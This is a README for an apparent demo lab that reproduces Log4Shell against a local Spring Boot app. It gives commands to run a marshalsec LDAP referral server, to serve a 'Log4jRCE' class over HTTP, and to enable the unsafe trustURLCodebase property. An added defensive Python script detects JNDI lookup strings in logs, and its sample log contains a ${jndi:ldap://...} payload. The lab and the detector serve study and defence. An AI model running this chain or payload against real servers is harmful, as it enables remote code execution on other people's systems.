This code base contains the code for reproducing the log4j vulnerability in a Spring Boot app.
- Clone this repo on to your local machine:

      git@github.com:dilipsundarraj1/log4j-exploit-demo.git

- Import the project into IntelliJ.
- The app runs on port 8080. Make sure you have this port available.
- Import the project into IntelliJ
- Build the project using Maven
  - To build from the terminal, use the command below:

        mvn clean package -DskipTests

  - To build in IntelliJ, run the Maven goals below:

        clean package -DskipTests

- Run the command below to start up the LDAP server:

      java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE"

  - This starts the LDAP server on port 1389.
  - Add the system property below in the GreetingsServiceApplication class. It enables the LDAP call invocation in the JVM (loading classes from the remote codebase an LDAP reference points to, which current JDKs disable by default):

        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")

- Import the hacker-remote-server module in IntelliJ
- Start the simple HTTP server using the command below (it serves the current directory on port 8000, the port the LDAP server URL above refers to):

      python3 -m http.server

Modules in this repo:

- hacker-remote-server: hosts the compiled Java code, which is the actual code that gets executed in the target JVM
- marshalsec: holds the source code for spinning up an LDAP server locally
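As an added example that is not part of this repo, a small Python script a defender could run over the application's logs to spot the JNDI lookup string this lab triggers, together with a check for the trustURLCodebase property the setup above turns on. The log lines and the GreetingsController logger name are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample application log lines (not taken from the project). The second
# line carries a JNDI lookup string aimed at a local LDAP listener on port 1389, the
# port the marshalsec server in this README listens on.
SAMPLE_LOG = """\
2021-12-11T10:15:01Z INFO  GreetingsController - greeting for user-agent: Mozilla/5.0
2021-12-11T10:15:07Z INFO  GreetingsController - greeting for user-agent: ${jndi:ldap://127.0.0.1:1389/Log4jRCE}
2021-12-11T10:15:09Z INFO  GreetingsController - greeting for user-agent: curl/7.79.1
"""

# A Log4j lookup that opens a JNDI reference: "${jndi:<scheme>://<host>[:<port>]/...}".
# Case-insensitive so differently capitalised variants are still caught.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    scheme: str
    host: str
    port: Optional[int]


def find_jndi_lookups(log_text: str) -> List[Finding]:
    """Return one Finding per JNDI lookup found in the given log text."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            port = int(m.group("port")) if m.group("port") else None
            findings.append(Finding(line_no, m.group("scheme").lower(), m.group("host"), port))
    return findings


def remote_codebase_enabled(system_properties: dict) -> bool:
    """True when the property this README sets is on, i.e. the JVM will fetch and load
    classes from the codebase URL an LDAP reference points to. The JDK default is
    false, which is the setting to keep outside this lab."""
    value = system_properties.get("com.sun.jndi.ldap.object.trustURLCodebase", "false")
    return value.strip().lower() == "true"


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f.line_no}: JNDI lookup via {f.scheme} to {f.host}:{f.port}")
```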